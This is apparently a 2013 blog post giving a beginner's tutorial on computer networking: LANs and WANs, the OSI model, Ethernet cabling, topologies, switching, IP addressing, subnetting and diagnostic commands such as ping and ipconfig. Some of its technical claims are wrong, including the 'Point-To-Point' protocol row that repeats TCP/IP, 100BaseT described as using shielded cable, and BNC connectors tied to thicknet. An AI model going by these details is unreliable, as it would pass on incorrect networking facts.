Monday, March 18, 2013

SPECIAL BASIC NETWORKING

What is a computer Network?

A network is any collection of independent computers that communicate with one another over a shared network medium. A computer network is a collection of two or more connected computers. When these computers are joined in a network, people can share files and peripherals such as modems, printers, tape backup drives, or CD-ROM drives. When networks at multiple locations are connected using services available from phone companies, people can send e-mail, share links to the global Internet, or conduct video conferences in real time with other remote users. When a network becomes open sourced it can be managed properly with online collaboration software. As companies rely on applications like electronic mail and database management for core business operations, computer networking becomes increasingly more important.
Every network includes:

  • At least two computers Server or Client workstation.
  • Networking Interface Card's (NIC)
  • A connection medium, usually a wire or cable, although wireless communication between networked computers and peripherals is also possible.
  • Network Operating system software, such as Microsoft Windows NT or 2000, Novell NetWare, Unix and Linux.

Types of Networks:

LANs (Local Area Networks)

A network is any collection of independent computers that communicate with one another over a shared network medium. LANs are networks usually confined to a geographic area, such as a single building or a college campus. LANs can be small, linking as few as three computers, but often link hundreds of computers used by thousands of people. The development of standard networking protocols and media has resulted in worldwide proliferation of LANs throughout business and educational organizations.

WANs (Wide Area Networks)

Wide area networking combines multiple LANs that are geographically separate. This is accomplished by connecting the different LANs using services such as dedicated leased phone lines, dial-up phone lines (both synchronous and asynchronous), satellite links, and data packet carrier services. Wide area networking can be as simple as a modem and remote access server for employees to dial into, or it can be as complex as hundreds of branch offices globally linked using special routing protocols and filters to minimize the expense of sending data sent over vast distances.

Internet

Basic Networking TutorialThe Internet is a system of linked networks that are worldwide in scope and facilitate data communication services such as remote login, file transfer, electronic mail, the World Wide Web and newsgroups.

With the meteoric rise in demand for connectivity, the Internet has become a communications highway for millions of users. The Internet was initially restricted to military and academic institutions, but now it is a full-fledged conduit for any and all forms of information and commerce. Internet websites now provide personal, educational, political and economic resources to every corner of the planet.

Intranet

With the advancements made in browser-based software for the Internet, many private organizations are implementing intranets. An intranet is a private network utilizing Internet-type tools, but available only within that organization. For large organizations, an intranet provides an easy access mode to corporate information for employees.

MANs (Metropolitan area Networks)

The refers to a network of computers with in a City.

VPN (Virtual Private Network)

VPN uses a technique known as tunneling to transfer data securely on the Internet to a remote access server on your workplace network. Using a VPN helps you save money by using the public Internet instead of making long–distance phone calls to connect securely with your private network. There are two ways to create a VPN connection, by dialing an Internet service provider (ISP), or connecting directly to Internet.

Categories of Network:

Peer to Peer and Server/Client NetworkNetwork can be divided in to two main categories:

  • Peer-to-peer.
  • Server – based.
In peer-to-peer networking there are no dedicated servers or hierarchy among the computers. All of the computers are equal and therefore known as peers. Normally each computer serves as Client/Server and there is no one assigned to be an administrator responsible for the entire network.

Peer-to-peer networks are good choices for needs of small organizations where the users are allocated in the same general area, security is not an issue and the organization and the network will have limited growth within the foreseeable future.

The term Client/server refers to the concept of sharing the work involved in processing data between the client computer and the most powerful server computer.

The client/server network is the most efficient way to provide:

  • Databases and management of applications such as Spreadsheets, Accounting, Communications and Document management.
  • Network management.
  • Centralized file storage.
The client/server model is basically an implementation of distributed or cooperative processing. At the heart of the model is the concept of splitting application functions between a client and a server processor. The division of labor between the different processors enables the application designer to place an application function on the processor that is most appropriate for that function. This lets the software designer optimize the use of processors--providing the greatest possible return on investment for the hardware.

Client/server application design also lets the application provider mask the actual location of application function. The user often does not know where a specific operation is executing. The entire function may execute in either the PC or server, or the function may be split between them. This masking of application function locations enables system implementers to upgrade portions of a system over time with a minimum disruption of application operations, while protecting the investment in existing hardware and software.

OSI ModelThe OSI Model:

Open System Interconnection (OSI) reference model has become an International standard and serves as a guide for networking. This model is the best known and most widely used guide to describe networking environments. Vendors design network products based on the specifications of the OSI model. It provides a description of how network hardware and software work together in a layered fashion to make communications possible. It also helps with trouble shooting by providing a frame of reference that describes how components are supposed to function.

There are seven to get familiar with and these are the physical layer, data link layer, network layer, transport layer, session layer, presentation layer, and the application layer.
  • Physical Layer, is just that the physical parts of the network such as wires, cables, and there media along with the length. Also this layer takes note of the electrical signals that transmit data throughout system.
  • Data Link Layer, this layer is where we actually assign meaning to the electrical signals in the network. The layer also determines the size and format of data sent to printers, and other devices. Also I don't want to forget that these are also called nodes in the network. Another thing to consider in this layer is will also allow and define the error detection and correction schemes that insure data was sent and received.
  • Network Layer, this layer provides the definition for the connection of two dissimilar networks.
  • Transport Layer, this layer allows data to be broken into smaller packages for data to be distributed and addressed to other nodes (workstations).
  • Session Layer, this layer helps out with the task to carry information from one node (workstation) to another node (workstation). A session has to be made before we can transport information to another computer.
  • Presentation Layer, this layer is responsible to code and decode data sent to the node.
  • Application Layer, this layer allows you to use an application that will communicate with say the operation system of a server. A good example would be using your web browser to interact with the operating system on a server such as Windows NT, which in turn gets the data you requested.

Network Architectures:

Ethernet Network ArchitectureEthernet

Ethernet is the most popular physical layer LAN technology in use today. Other LAN types include Token Ring, Fast Ethernet, Fiber Distributed Data Interface (FDDI), Asynchronous Transfer Mode (ATM) and LocalTalk. Ethernet connection is popular because it strikes a good balance between speed, cost and ease of installation. These benefits, combined with wide acceptance in the computer marketplace and the ability to support virtually all popular network protocols, make Ethernet an ideal networking technology for most computer users today. The Institute for Electrical and Electronic Engineers (IEEE) defines the Ethernet standard as IEEE Standard 802.3. This standard defines rules for configuring an Ethernet network as well as specifying how elements in an Ethernet network interact with one another. By adhering to the IEEE standard, network equipment and network protocols can communicate efficiently.

Fast Ethernet

For Ethernet networks that need higher transmission speeds, the Fast Ethernet standard (IEEE 802.3u) has been established. This standard raises the Ethernet speed limit from 10 Megabits per second (Mbps) to 100 Mbps with only minimal changes to the existing cable structure. There are three types of Fast Ethernet: 100BASE-TX for use with level 5 UTP cable, 100BASE-FX for use with fiber-optic cable, and 100BASE-T4 which utilizes an extra two wires for use with level 3 UTP cable. The 100BASE-TX standard has become the most popular due to its close compatibility with the 10BASE-T Ethernet standard. For the network manager, the incorporation of Fast Ethernet into an existing configuration presents a host of decisions. Managers must determine the number of users in each site on the network that need the higher throughput, decide which segments of the backbone need to be reconfigured specifically for 100BASE-T and then choose the necessary hardware to connect the 100BASE-T segments with existing 10BASE-T segments. Gigabit Ethernet is a future technology that promises a migration path beyond Fast Ethernet so the next generation of networks will support even higher data transfer speeds.

Token Ring ArchitectureToken Ring

Token Ring is another form of network configuration which differs from Ethernet in that all messages are transferred in a unidirectional manner along the ring at all times. Data is transmitted in tokens, which are passed along the ring and viewed by each device. When a device sees a message addressed to it, that device copies the message and then marks that message as being read. As the message makes its way along the ring, it eventually gets back to the sender who now notes that the message was received by the intended device. The sender can then remove the message and free that token for use by others.

Various PC vendors have been proponents of Token Ring networks at different times and thus these types of networks have been implemented in many organizations.

FDDI architectureFDDI

FDDI (Fiber-Distributed Data Interface) is a standard for data transmission on fiber optic lines in a local area network that can extend in range up to 200 km (124 miles). The FDDI protocol is based on the token ring protocol. In addition to being large geographically, an FDDI local area network can support thousands of users.

Protocols:

Network protocols are standards that allow computers to communicate. A protocol defines how computers identify one another on a network, the form that the data should take in transit, and how this information is processed once it reaches its final destination. Protocols also define procedures for handling lost or damaged transmissions or "packets." TCP/IP (for UNIX, Windows NT, Windows 95 and other platforms), IPX (for Novell NetWare), DECnet (for networking Digital Equipment Corp. computers), AppleTalk (for Macintosh computers), and NetBIOS/NetBEUI (for LAN Manager and Windows NT networks) are the main types of network protocols in use today.

Although each network protocol is different, they all share the same physical cabling. This common method of accessing the physical network allows multiple protocols to peacefully coexist over the network media, and allows the builder of a network to use common hardware for a variety of protocols. This concept is known as "protocol independence,"

Some Important Protocols and their job:
Protocol Acronym Its Job
Point-To-Point TCP/IP The backbone protocol of the internet. Popular also for intranets using the internet
Transmission Control Protocol/internet Protocol TCP/IP The backbone protocol of the internet. Popular also for intranets using the internet
Internetwork Package Exchange/Sequenced Packet Exchange IPX/SPX This is a standard protocol for Novell Network Operating System
NetBIOS Extended User Interface NetBEUI This is a Microsoft protocol that doesn't support routing to other networks
File Transfer Protocol FTP Used to send and receive files from a remote host
Hyper Text Transfer Protocol HTTP Used for the web to send documents that are encoded in HTML.
Network File Services NFS Allows network nodes or workstations to access files and drives as if they were their own.
Simple Mail Transfer Protocol SMTP Used to send Email over a network
Telnet   Used to connect to a host and emulate a terminal that the remote server can recognize

Introduction to TCP/IP Networks:

TCP/IP-based networks play an increasingly important role in computer networks. Perhaps one reason for their appeal is that they are based on an open specification that is not controlled by any vendor.

What Is TCP/IP?

TCP stands for Transmission Control Protocol and IP stands for Internet Protocol. The term TCP/IP is not limited just to these two protocols, however. Frequently, the term TCP/IP is used to refer to a group of protocols related to the TCP and IP protocols such as the User Datagram Protocol (UDP), File Transfer Protocol (FTP), Terminal Emulation Protocol (TELNET), and so on.

The Origins of TCP/IP

In the late 1960s, DARPA (the Defense Advanced Research Project Agency), in the United States, noticed that there was a rapid proliferation of computers in military communications. Computers, because they can be easily programmed, provide flexibility in achieving network functions that is not available with other types of communications equipment. The computers then used in military communications were manufactured by different vendors and were designed to interoperate with computers from that vendor only. Vendors used proprietary protocols in their communications equipment. The military had a multi vendor network but no common protocol to support the heterogeneous equipment from different vendors

Net work Cables and Stuff:

In the network you will commonly find three types of cables used these are the, coaxial cable, fiber optic and twisted pair.

Thick Coaxial Cable

This type cable is usually yellow in color and used in what is called thicknets, and has two conductors. This coax can be used in 500-meter lengths. The cable itself is made up of a solid center wire with a braided metal shield and plastic sheathing protecting the rest of the wire.

Thin Coaxial Cable

As with the thick coaxial cable is used in thicknets the thin version is used in thinnets. This type cable is also used called or referred to as RG-58. The cable is really just a cheaper version of the thick cable.

Fiber Optic Cable

As we all know fiber optics are pretty darn cool and not cheap. This cable is smaller and can carry a vast amount of information fast and over long distances.

Twisted Pair Cables

These come in two flavors of unshielded and shielded.

Unshielded Twisted Pair and Shielded Twisted Pair

Shielded Twisted Pair (STP)

Is more common in high-speed networks. The biggest difference you will see in the UTP and STP is that the STP use's metallic shield wrapping to protect the wire from interference.

-Something else to note about these cables is that they are defined in numbers also. The bigger the number the better the protection from interference. Most networks should go with no less than a CAT 3 and CAT 5 is most recommended.

-Now you know about cables we need to know about connectors. This is pretty important and you will most likely need the RJ-45 connector. This is the cousin of the phone jack connector and looks real similar with the exception that the RJ-45 is bigger. Most commonly your connector are in two flavors and this is BNC (Bayonet Naur Connector) used in thicknets and the RJ-45 used in smaller networks using UTP/STP.

Unshielded Twisted Pair (UTP)

This is the most popular form of cables in the network and the cheapest form that you can go with. The UTP has four pairs of wires and all inside plastic sheathing. The biggest reason that we call it Twisted Pair is to protect the wires from interference from themselves. Each wire is only protected with a thin plastic sheath.

Ethernet Cabling

Now to familiarize you with more on the Ethernet and it's cabling we need to look at the 10's. 10Base2, is considered the thin Ethernet, thinnet, and thinwire which uses light coaxial cable to create a 10 Mbps network. The cable segments in this network can't be over 185 meters in length. These cables connect with the BNC connector. Also as a note these unused connection must have a terminator, which will be a 50-ohm terminator.

10Base5, this is considered a thicknet and is used with coaxial cable arrangement such as the BNC connector. The good side to the coaxial cable is the high-speed transfer and cable segments can be up to 500 meters between nodes/workstations. You will typically see the same speed as the 10Base2 but larger cable lengths for more versatility.

10BaseT, the “T” stands for twisted as in UTP (Unshielded Twisted Pair) and uses this for 10Mbps of transfer. The down side to this is you can only have cable lengths of 100 meters between nodes/workstations. The good side to this network is they are easy to set up and cheap! This is why they are so common an ideal for small offices or homes.

100BaseT, is considered Fast Ethernet uses STP (Shielded Twisted Pair) reaching data transfer of 100Mbps. This system is a little more expensive but still remains popular as the 10BaseT and cheaper than most other type networks. This on of course would be the cheap fast version.

10BaseF, this little guy has the advantage of fiber optics and the F stands for just that. This arrangement is a little more complicated and uses special connectors and NIC's along with hubs to create its network. Pretty darn neat and not to cheap on the wallet.

An important part of designing and installing an Ethernet is selecting the appropriate Ethernet medium. There are four major types of media in use today: Thickwire for 10BASE5 networks, thin coax for 10BASE2 networks, unshielded twisted pair (UTP) for 10BASE-T networks and fiber optic for 10BASE-FL or Fiber-Optic Inter-Repeater Link (FOIRL) networks. This wide variety of media reflects the evolution of Ethernet and also points to the technology's flexibility. Thickwire was one of the first cabling systems used in Ethernet but was expensive and difficult to use. This evolved to thin coax, which is easier to work with and less expensive.

Network Topologies:

What is a Network topology?

A network topology is the geometric arrangement of nodes and cable links in a LAN,

There are three topology's to think about when you get into networks. These are the star, rind, and the bus.

Star, in a star topology each node has a dedicated set of wires connecting it to a central network hub. Since all traffic passes through the hub, the hub becomes a central point for isolating network problems and gathering network statistics.

Ring, a ring topology features a logically closed loop. Data packets travel in a single direction around the ring from one network device to the next. Each network device acts as a repeater, meaning it regenerates the signal

Bus, the bus topology, each node (computer, server, peripheral etc.) attaches directly to a common cable. This topology most often serves as the backbone for a network. In some instances, such as in classrooms or labs, a bus will connect small workgroups

Collisions:

Ethernet is a shared media, so there are rules for sending packets of data to avoid conflicts and protect data integrity. Nodes determine when the network is available for sending packets. It is possible that two nodes at different locations attempt to send data at the same time. When both PCs are transferring a packet to the network at the same time, a collision will result.

Minimizing collisions is a crucial element in the design and operation of networks. Increased collisions are often the result of too many users on the network, which results in a lot of contention for network bandwidth. This can slow the performance of the network from the user's point of view. Segmenting the network, where a network is divided into different pieces joined together logically with a bridge or switch, is one way of reducing an overcrowded network.

Ethernet Products:

The standards and technology that have just been discussed help define the specific products that network managers use to build Ethernet networks. The following text discusses the key products needed to build an Ethernet LAN.

Transceivers

Transceivers are used to connect nodes to the various Ethernet media. Most computers and network interface cards contain a built-in 10BASE-T or 10BASE2 transceiver, allowing them to be connected directly to Ethernet without requiring an external transceiver. Many Ethernet devices provide an AUI connector to allow the user to connect to any media type via an external transceiver. The AUI connector consists of a 15-pin D-shell type connector, female on the computer side, male on the transceiver side. Thickwire (10BASE5) cables also use transceivers to allow connections.

For Fast Ethernet networks, a new interface called the MII (Media Independent Interface) was developed to offer a flexible way to support 100 Mbps connections. The MII is a popular way to connect 100BASE-FX links to copper-based Fast Ethernet devices.

Network Interface CardsNetwork Interface Cards:

Network interface cards, commonly referred to as NICs, and are used to connect a PC to a network. The NIC provides a physical connection between the networking cable and the computer's internal bus. Different computers have different bus architectures; PCI bus master slots are most commonly found on 486/Pentium PCs and ISA expansion slots are commonly found on 386 and older PCs. NICs come in three basic varieties: 8-bit, 16-bit, and 32-bit. The larger the number of bits that can be transferred to the NIC, the faster the NIC can transfer data to the network cable.

Many NIC adapters comply with Plug-n-Play specifications. On these systems, NICs are automatically configured without user intervention, while on non-Plug-n-Play systems, configuration is done manually through a setup program and/or DIP switches.

Cards are available to support almost all networking standards, including the latest Fast Ethernet environment. Fast Ethernet NICs are often 10/100 capable, and will automatically set to the appropriate speed. Full duplex networking is another option, where a dedicated connection to a switch allows a NIC to operate at twice the speed.

Hubs/Repeaters:

Hubs/repeaters are used to connect together two or more Ethernet segments of any media type. In larger designs, signal quality begins to deteriorate as segments exceed their maximum length. Hubs provide the signal amplification required to allow a segment to be extended a greater distance. A hub takes any incoming signal and repeats it out all ports.

Ethernet hubs are necessary in star topologies such as 10BASE-T. A multi-port twisted pair hub allows several point-to-point segments to be joined into one network. One end of the point-to-point link is attached to the hub and the other is attached to the computer. If the hub is attached to a backbone, then all computers at the end of the twisted pair segments can communicate with all the hosts on the backbone. The number and type of hubs in any one-collision domain is limited by the Ethernet rules. These repeater rules are discussed in more detail later.
Network Type Max Nodes
Per Segment
Max Distance
Per Segment
10BASE-T
10BASE2
10BASE5
10BASE-FL
2
30
100
2
100m
185m
500m
2000m

Adding Speed:

While repeaters allow LANs to extend beyond normal distance limitations, they still limit the number of nodes that can be supported. Bridges and switches, however, allow LANs to grow significantly larger by virtue of their ability to support full Ethernet segments on each port. Additionally, bridges and switches selectively filter network traffic to only those packets needed on each segment - this significantly increases throughput on each segment and on the overall network. By providing better performance and more flexibility for network topologies, bridges and switches will continue to gain popularity among network managers.

Bridges:

The function of a bridge is to connect separate networks together. Bridges connect different networks types (such as Ethernet and Fast Ethernet) or networks of the same type. Bridges map the Ethernet addresses of the nodes residing on each network segment and allow only necessary traffic to pass through the bridge. When a packet is received by the bridge, the bridge determines the destination and source segments. If the segments are the same, the packet is dropped ("filtered"); if the segments are different, then the packet is "forwarded" to the correct segment. Additionally, bridges do not forward bad or misaligned packets.

Bridges are also called "store-and-forward" devices because they look at the whole Ethernet packet before making filtering or forwarding decisions. Filtering packets, and regenerating forwarded packets enable bridging technology to split a network into separate collision domains. This allows for greater distances and more repeaters to be used in the total network design.

Ethernet Switches

Ethernet Switches:

Ethernet switches are an expansion of the concept in Ethernet bridging. LAN switches can link four, six, ten or more networks together, and have two basic architectures: cut-through and store-and-forward. In the past, cut-through switches were faster because they examined the packet destination address only before forwarding it on to its destination segment. A store-and-forward switch, on the other hand, accepts and analyzes the entire packet before forwarding it to its destination.

It takes more time to examine the entire packet, but it allows the switch to catch certain packet errors and keep them from propagating through the network. Both cut-through and store-and-forward switches separate a network into collision domains, allowing network design rules to be extended. Each of the segments attached to an Ethernet switch has a full 10 Mbps of bandwidth shared by fewer users, which results in better performance (as opposed to hubs that only allow bandwidth sharing from a single Ethernet). Newer switches today offer high-speed links, FDDI, Fast Ethernet or ATM. These are used to link switches together or give added bandwidth to high-traffic servers. A network composed of a number of switches linked together via uplinks is termed a "collapsed backbone" network.

Routers:

Routers filter out network traffic by specific protocol rather than by packet address. Routers also divide networks logically instead of physically. An IP router can divide a network into various subnets so that only traffic destined for particular IP addresses can pass between segments. Network speed often decreases due to this type of intelligent forwarding. Such filtering takes more time than that exercised in a switch or bridge, which only looks at the Ethernet address. However, in more complex networks, overall efficiency is improved by using routers.

What is a network firewall?

A firewall is a system or group of systems that enforces an access control policy between two networks. The actual means by which this is accomplished varies widely, but in principle, the firewall can be thought of as a pair of mechanisms: one which exists to block traffic, and the other which exists to permit traffic. Some firewalls place a greater emphasis on blocking traffic, while others emphasize permitting traffic. Probably the most important thing to recognize about a firewall is that it implements an access control policy. If you don't have a good idea of what kind of access you want to allow or to deny, a firewall really won't help you. It's also important to recognize that the firewall's configuration, because it is a mechanism for enforcing policy, imposes its policy on everything behind it. Administrators for firewalls managing the connectivity for a large number of hosts therefore have a heavy responsibility.

Network Design Criteria:

Ethernets and Fast Ethernets have design rules that must be followed in order to function correctly. Maximum number of nodes, number of repeaters and maximum segment distances are defined by the electrical and mechanical design properties of each type of Ethernet and Fast Ethernet media.

A network using repeaters, for instance, functions with the timing constraints of Ethernet. Although electrical signals on the Ethernet media travel near the speed of light, it still takes a finite time for the signal to travel from one end of a large Ethernet to another. The Ethernet standard assumes it will take roughly 50 microseconds for a signal to reach its destination.

Ethernet is subject to the "5-4-3" rule of repeater placement: the network can only have five segments connected; it can only use four repeaters; and of the five segments, only three can have users attached to them; the other two must be inter-repeater links.

If the design of the network violates these repeater and placement rules, then timing guidelines will not be met and the sending station will resend that packet. This can lead to lost packets and excessive resent packets, which can slow network performance and create trouble for applications. Fast Ethernet has modified repeater rules, since the minimum packet size takes less time to transmit than regular Ethernet. The length of the network links allows for a fewer number of repeaters. In Fast Ethernet networks, there are two classes of repeaters. Class I repeaters have a latency of 0.7 microseconds or less and are limited to one repeater per network. Class II repeaters have a latency of 0.46 microseconds or less and are limited to two repeaters per network. The following are the distance (diameter) characteristics for these types of Fast Ethernet repeater combinations:
Fast Ethernet Copper Fiber
No Repeaters
One Class I Repeater
One Class II Repeater
Two Class II Repeaters
100m
200m
200m
205m
412m*
272m
272m
228m
* Full Duplex Mode 2 km


When conditions require greater distances or an increase in the number of nodes/repeaters, then a bridge, router or switch can be used to connect multiple networks together. These devices join two or more separate networks, allowing network design criteria to be restored. Switches allow network designers to build large networks that function well. The reduction in costs of bridges and switches reduces the impact of repeater rules on network design.

Each network connected via one of these devices is referred to as a separate collision domain in the overall network.

Types of Servers:

Device Servers

A device server is defined as a specialized, network-based hardware device designed to perform a single or specialized set of server functions. It is characterized by a minimal operating architecture that requires no per seat network operating system license, and client access that is independent of any operating system or proprietary protocol. In addition the device server is a "closed box," delivering extreme ease of installation, minimal maintenance, and can be managed by the client remotely via a Web browser.

Print servers, terminal servers, remote access servers and network time servers are examples of device servers which are specialized for particular functions. Each of these types of servers has unique configuration attributes in hardware or software that help them to perform best in their particular arena.

Print Servers

Print servers allow printers to be shared by other users on the network. Supporting either parallel and/or serial interfaces, a print server accepts print jobs from any person on the network using supported protocols and manages those jobs on each appropriate printer.

Print servers generally do not contain a large amount of memory; printers simply store information in a queue. When the desired printer becomes available, they allow the host to transmit the data to the appropriate printer port on the server. The print server can then simply queue and print each job in the order in which print requests are received, regardless of protocol used or the size of the job.

Multiport Device Servers

Devices that are attached to a network through a multiport device server can be shared between terminals and hosts at both the local site and throughout the network. A single terminal may be connected to several hosts at the same time (in multiple concurrent sessions), and can switch between them. Multiport device servers are also used to network devices that have only serial outputs. A connection between serial ports on different servers is opened, allowing data to move between the two devices.

Given its natural translation ability, a multi-protocol multiport device server can perform conversions between the protocols it knows, like LAT and TCP/IP. While server bandwidth is not adequate for large file transfers, it can easily handle host-to-host inquiry/response applications, electronic mailbox checking, etc. And it is far more economical than the alternatives of acquiring expensive host software and special-purpose converters. Multiport device and print servers give their users greater flexibility in configuring and managing their networks.

Whether it is moving printers and other peripherals from one network to another, expanding the dimensions of interoperability or preparing for growth, multiport device servers can fulfill your needs, all without major rewiring.

Access Servers

While Ethernet is limited to a geographic area, remote users such as traveling sales people need access to network-based resources. Remote LAN access, or remote access, is a popular way to provide this connectivity. Access servers use telephone services to link a user or office with an office network. Dial-up remote access solutions such as ISDN or asynchronous dial introduce more flexibility. Dial-up remote access offers both the remote office and the remote user the economy and flexibility of "pay as you go" telephone services. ISDN is a special telephone service that offers three channels, two 64 Kbps "B" channels for user data and a "D" channel for setting up the connection. With ISDN, the B channels can be combined for double bandwidth or separated for different applications or users. With asynchronous remote access, regular telephone lines are combined with modems and remote access servers to allow users and networks to dial anywhere in the world and have data access. Remote access servers provide connection points for both dial-in and dial-out applications on the network to which they are attached. These hybrid devices route and filter protocols and offer other services such as modem pooling and terminal/printer services. For the remote PC user, one can connect from any available telephone jack (RJ45), including those in a hotel rooms or on most airplanes.

Network Time Servers

A network time server is a server specialized in the handling of timing information from sources such as satellites or radio broadcasts and is capable of providing this timing data to its attached network. Specialized protocols such as NTP or udp/time allow a time server to communicate to other network nodes ensuring that activities that must be coordinated according to their time of execution are synchronized correctly. GPS satellites are one source of information that can allow global installations to achieve constant timing.

IP Addressing:

An IP (Internet Protocol) address is a unique identifier for a node or host connection on an IP network. An IP address is a 32 bit binary number usually represented as 4 decimal values, each representing 8 bits, in the range 0 to 255 (known as octets) separated by decimal points. This is known as "dotted decimal" notation.

Example: 140.179.220.200

It is sometimes useful to view the values in their binary form.

140 .179 .220 .200

10001100.10110011.11011100.11001000

Every IP address consists of two parts, one identifying the network and one identifying the node. The Class of the address and the subnet mask determine which part belongs to the network address and which part belongs to the node address.

Address Classes:

There are 5 different address classes. You can determine which class any IP address is in by examining the first 4 bits of the IP address.

Class A addresses begin with 0xxx, or 1 to 126 decimal.

Class B addresses begin with 10xx, or 128 to 191 decimal.

Class C addresses begin with 110x, or 192 to 223 decimal.

Class D addresses begin with 1110, or 224 to 239 decimal.

Class E addresses begin with 1111, or 240 to 254 decimal.

Addresses beginning with 01111111, or 127 decimal, are reserved for loopback and for internal testing on a local machine. [You can test this: you should always be able to ping 127.0.0.1, which points to yourself] Class D addresses are reserved for multicasting. Class E addresses are reserved for future use. They should not be used for host addresses.

Now we can see how the Class determines, by default, which part of the IP address belongs to the network (N) and which part belongs to the node (n).

Class A -- NNNNNNNN.nnnnnnnn.nnnnnnn.nnnnnnn

Class B -- NNNNNNNN.NNNNNNNN.nnnnnnnn.nnnnnnnn

Class C -- NNNNNNNN.NNNNNNNN.NNNNNNNN.nnnnnnnn

In the example, 140.179.220.200 is a Class B address so by default the Network part of the address (also known as the Network Address) is defined by the first two octets (140.179.x.x) and the node part is defined by the last 2 octets (x.x.220.200).

In order to specify the network address for a given IP address, the node section is set to all "0"s. In our example, 140.179.0.0 specifies the network address for 140.179.220.200. When the node section is set to all "1"s, it specifies a broadcast that is sent to all hosts on the network. 140.179.255.255 specifies the example broadcast address. Note that this is true regardless of the length of the node section.

Private Subnets:

There are three IP network addresses reserved for private networks. The addresses are 10.0.0.0/8, 172.16.0.0/12, and 192.168.0.0/16. They can be used by anyone setting up internal IP networks, such as a lab or home LAN behind a NAT or proxy server or a router. It is always safe to use these because routers on the Internet will never forward packets coming from these addresses

Subnetting an IP Network can be done for a variety of reasons, including organization, use of different physical media (such as Ethernet, FDDI, WAN, etc.), preservation of address space, and security. The most common reason is to control network traffic. In an Ethernet network, all nodes on a segment see all the packets transmitted by all the other nodes on that segment. Performance can be adversely affected under heavy traffic loads, due to collisions and the resulting retransmissions. A router is used to connect IP networks to minimize the amount of traffic each segment must receive.

Subnet Masking

Applying a subnet mask to an IP address allows you to identify the network and node parts of the address. The network bits are represented by the 1s in the mask, and the node bits are represented by the 0s. Performing a bitwise logical AND operation between the IP address and the subnet mask results in the Network Address or Number.

For example, using our test IP address and the default Class B subnet mask, we get:

10001100.10110011.11110000.11001000 140.179.240.200 Class B IP Address

11111111.11111111.00000000.00000000 255.255.000.000 Default Class B Subnet Mask

10001100.10110011.00000000.00000000 140.179.000.000 Network Address

Default subnet masks:

Class A - 255.0.0.0 - 11111111.00000000.00000000.00000000

Class B - 255.255.0.0 - 11111111.11111111.00000000.00000000

Class C - 255.255.255.0 - 11111111.11111111.11111111.00000000

CIDR -- Classless InterDomain Routing.

CIDR was invented several years ago to keep the internet from running out of IP addresses. The "classful" system of allocating IP addresses can be very wasteful; anyone who could reasonably show a need for more that 254 host addresses was given a Class B address block of 65533 host addresses. Even more wasteful were companies and organizations that were allocated Class A address blocks, which contain over 16 Million host addresses! Only a tiny percentage of the allocated Class A and Class B address space has ever been actually assigned to a host computer on the Internet.

People realized that addresses could be conserved if the class system was eliminated. By accurately allocating only the amount of address space that was actually needed, the address space crisis could be avoided for many years. This was first proposed in 1992 as a scheme called Supernetting.

The use of a CIDR notated address is the same as for a Classful address. Classful addresses can easily be written in CIDR notation (Class A = /8, Class B = /16, and Class C = /24)

It is currently almost impossible for an individual or company to be allocated their own IP address blocks. You will simply be told to get them from your ISP. The reason for this is the ever-growing size of the internet routing table. Just 5 years ago, there were less than 5000 network routes in the entire Internet. Today, there are over 90,000. Using CIDR, the biggest ISPs are allocated large chunks of address space (usually with a subnet mask of /19 or even smaller); the ISP's customers (often other, smaller ISPs) are then allocated networks from the big ISP's pool. That way, all the big ISP's customers (and their customers, and so on) are accessible via 1 network route on the Internet.

It is expected that CIDR will keep the Internet happily in IP addresses for the next few years at least. After that, IPv6, with 128 bit addresses, will be needed. Under IPv6, even sloppy address allocation would comfortably allow a billion unique IP addresses for every person on earth

Examining your network with commands:

Ping

PING is used to check for a response from another computer on the network. It can tell you a great deal of information about the status of the network and the computers you are communicating with.

Ping returns different responses depending on the computer in question. The responses are similar depending on the options used.

Ping uses IP to request a response from the host. It does not use TCP

.It takes its name from a submarine sonar search - you send a short sound burst and listen for an echo - a ping - coming back.

In an IP network, `ping' sends a short data burst - a single packet - and listens for a single packet in reply. Since this tests the most basic function of an IP network (delivery of single packet), it's easy to see how you can learn a lot from some `pings'.

To stop ping, type control-c. This terminates the program and prints out a nice summary of the number of packets transmitted, the number received, and the percentage of packets lost, plus the minimum, average, and maximum round-trip times of the packets.

Sample ping session

PING localhost (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: icmp_seq=0 ttl=255 time=2 ms
64 bytes from 127.0.0.1: icmp_seq=1 ttl=255 time=2 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=255 time=2 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=255 time=2 ms
64 bytes from 127.0.0.1: icmp_seq=4 ttl=255 time=2 ms
64 bytes from 127.0.0.1: icmp_seq=5 ttl=255 time=2 ms
64 bytes from 127.0.0.1: icmp_seq=6 ttl=255 time=2 ms
64 bytes from 127.0.0.1: icmp_seq=7 ttl=255 time=2 ms
64 bytes from 127.0.0.1: icmp_seq=8 ttl=255 time=2 ms
64 bytes from 127.0.0.1: icmp_seq=9 ttl=255 time=2 ms

localhost ping statistics

10 packets transmitted, 10 packets received, 0% packet loss
round-trip min/avg/max = 2/2/2 ms
meikro$

The Time To Live (TTL) field can be interesting. The main purpose of this is so that a packet doesn't live forever on the network and will eventually die when it is deemed "lost." But for us, it provides additional information. We can use the TTL to determine approximately how many router hops the packet has gone through. In this case it's 255 minus N hops, where N is the TTL of the returning Echo Replies. If the TTL field varies in successive pings, it could indicate that the successive reply packets are going via different routes, which isn't a great thing.

The time field is an indication of the round-trip time to get a packet to the remote host. The reply is measured in milliseconds. In general, it's best if round-trip times are under 200 milliseconds. The time it takes a packet to reach its destination is called latency. If you see a large variance in the round-trip times (which is called "jitter"), you are going to see poor performance talking to the host

NSLOOKUP

NSLOOKUP is an application that facilitates looking up hostnames on the network. It can reveal the IP address of a host or, using the IP address, return the host name.

It is very important when troubleshooting problems on a network that you can verify the components of the networking process. Nslookup allows this by revealing details within the infrastructure.

NETSTAT

NETSTAT is used to look up the various active connections within a computer. It is helpful to understand what computers or networks you are connected to. This allows you to further investigate problems. One host may be responding well but another may be less responsive.

IPconfig

This is a Microsoft windows NT, 2000 command. It is very useful in determining what could be wrong with a network.

This command when used with the /all switch, reveal enormous amounts of troubleshooting information within the system.

Windows 2000 IP Configuration

Host Name . . . . . . . . . . . . : cowder
Primary DNS Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Broadcast
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . :
WAN (PPP/SLIP) Interface
Physical Address. . . . . . . . . : 00-53-45-00-00-00
